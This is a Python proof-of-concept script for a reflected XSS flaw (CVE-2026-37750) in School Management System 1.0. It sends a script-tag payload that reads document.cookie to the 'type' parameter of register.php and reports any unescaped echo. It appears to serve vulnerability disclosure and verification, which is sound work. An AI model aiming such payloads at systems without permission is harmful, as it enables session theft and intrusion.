POC / exploit.py PY
#!/usr/bin/env python3
# Exploit Title: School Management System 1.0 - Reflected XSS
# Date: 2026-04-16
# Exploit Author: Varad AP Mene ([email protected])
# Vendor Homepage: https://github.com/mahmoudai1/school-management-system
# Software Link: https://github.com/mahmoudai1/school-management-system
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37750

import requests
import argparse
import sys

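def verify_xss(base_url):
    """Check whether ``register.php`` echoes the ``type`` parameter unescaped.

    Sends one GET request carrying a ``<script>`` marker in ``type`` and
    looks for that exact string in the response body.

    A match shows only that the value came back without HTML encoding. It
    does not show that a browser would run it: the check does not look at
    where in the document the value lands, nor at any
    Content-Security-Policy header. Treat a positive result as a finding to
    confirm by hand; the server-side fix is to HTML-encode the parameter
    before it is written into the page.

    Args:
        base_url: Application root, without a trailing slash.

    Returns:
        True when the marker is reflected verbatim in a response that a
        browser would treat as HTML, otherwise False.

    Raises:
        requests.RequestException: on connection failure, timeout or an
            invalid URL.
    """
    url = f"{base_url}/register.php"
    payload = "<script>alert(document.cookie)</script>"
    print(f"[*] Target  : {url}")
    print(f"[*] Payload : {payload}")

    # The context manager releases the session's pooled connections even
    # when the request raises; the body is already read by then.
    with requests.Session() as session:
        session.headers.update({'User-Agent': 'Mozilla/5.0'})
        r = session.get(url, params={'type': payload}, timeout=10)

    if payload not in r.text:
        print("[-] Not vulnerable.")
        return False

    # A verbatim echo in a response declared as JSON or plain text is not
    # rendered as markup, so reporting it would be a false positive. A
    # missing Content-Type is still treated as HTML, because the browser may
    # then sniff the type.
    content_type = r.headers.get('Content-Type', '')
    if content_type and 'html' not in content_type.lower():
        print(f"[-] Payload reflected, but Content-Type is {content_type!r}, "
              "not HTML; not reported as XSS.")
        return False

    print("[+] VULNERABLE! XSS reflected unescaped!")
    print(f"[+] PoC URL: {r.url}")
    return True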

def main():
    """Parse ``--url``, print the banner, run the check and set the exit status.

    Exit status is 0 when ``verify_xss`` returns True. It is 1 both when the
    check returns False and when the check raises, so a caller cannot tell
    "not vulnerable" from "request failed" by the status alone; the
    ``[-] Error:`` line on stdout is the only distinguishing signal.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument('--url', required=True, help='Target URL')
    options = cli.parse_args()

    rule = "=" * 60
    banner = (
        rule,
        "CVE-2026-37750 — Reflected XSS",
        "Product: School Management System 1.0",
        "Author : Varad AP Mene",
        rule,
    )
    for line in banner:
        print(line)

    # Trailing slashes are stripped so the path join in verify_xss does not
    # produce a double slash.
    try:
        reflected = verify_xss(options.url.rstrip('/'))
    except Exception as exc:
        print(f"[-] Error: {exc}")
        sys.exit(1)

    # SystemExit is not an Exception subclass, so exiting outside the try
    # block behaves the same as exiting inside it.
    sys.exit(0 if reflected else 1)

# Run the command-line entry point only when this file is executed as a
# script; importing the module has no side effects.
if __name__ == '__main__':
    main()